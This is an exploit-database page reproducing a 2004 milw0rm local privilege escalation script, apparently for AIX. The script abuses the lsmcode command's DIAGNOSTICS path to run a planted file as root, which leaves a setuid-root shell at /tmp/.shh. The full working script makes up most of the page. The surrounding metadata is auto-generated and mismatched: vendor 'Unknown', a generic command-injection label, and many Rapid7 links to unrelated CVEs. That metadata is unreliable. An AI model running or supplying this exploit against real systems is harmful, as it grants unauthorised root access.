header-logo
Suggest Exploit
vendor:
Unknown
by:
Unknown
7.5
CVSS
HIGH
Command Injection
78
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE not available
CPE: CPE not available
Metasploit: https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-3341/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/alma_linux-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/mfsa2023-34-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/mozilla-thunderbird-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/mfsa2023-36-cve-2023-4583/https://www.rapid7.com/db/vulnerabilities/notepadplusplus-cve-2023-40164/https://www.rapid7.com/db/vulnerabilities/notepadplusplus-cve-2023-40036/https://www.rapid7.com/db/vulnerabilities/notepadplusplus-cve-2023-40166/https://www.rapid7.com/db/vulnerabilities/adobe-coldfusion-cve-2023-38205/https://www.rapid7.com/db/vulnerabilities/adobe-coldfusion-cve-2023-38206/https://www.rapid7.com/db/vulnerabilities/adobe-coldfusion-cve-2023-38204/https://www.rapid7.com/db/vulnerabilities/adobe-coldfusion-cve-2023-38203/https://www.rapid7.com/db/vulnerabilities/adobe-coldfusion-cve-2023-29300/https://www.rapid7.com/db/vulnerabilities/adobe-coldfusion-cve-2023-29301/https://www.rapid7.com/db/vulnerabilities/adobe-coldfusion-cve-2023-29298/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-34095/https://www.rapid7.com/db/?q=CVE+not+available&type=&page=2https://www.rapid7.com/db/?q=CVE+not+available&type=&page=3https://www.rapid7.com/db/?q=CVE+not+available&type=&page=4https://www.rapid7.com/db/?q=CVE+not+available&type=&page=2
Other Scripts:
Platforms Tested:
2004

mkdirhier /tmp/aap/bin

This exploit allows an attacker to inject and execute arbitrary commands on the target system. The attacker creates a directory structure using the 'mkdirhier' command and then exports a variable to a specific directory. The attacker then writes a shell script to the exported directory that copies the '/bin/sh' binary to a hidden location, changes its ownership and permissions, and executes it. Finally, the attacker runs the 'lsmcode' command to execute the injected code by executing the hidden shell binary '/tmp/.shh'.

Mitigation:

To mitigate this vulnerability, it is recommended to ensure that user input is properly validated and sanitized before using it in any command execution. Additionally, limiting the privileges of the executed commands can also help in reducing the impact of command injection attacks.
Source

Exploit-DB raw data:

mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

# milw0rm.com [2004-12-21]

Navigation

Suggest Exploit

Services By CQR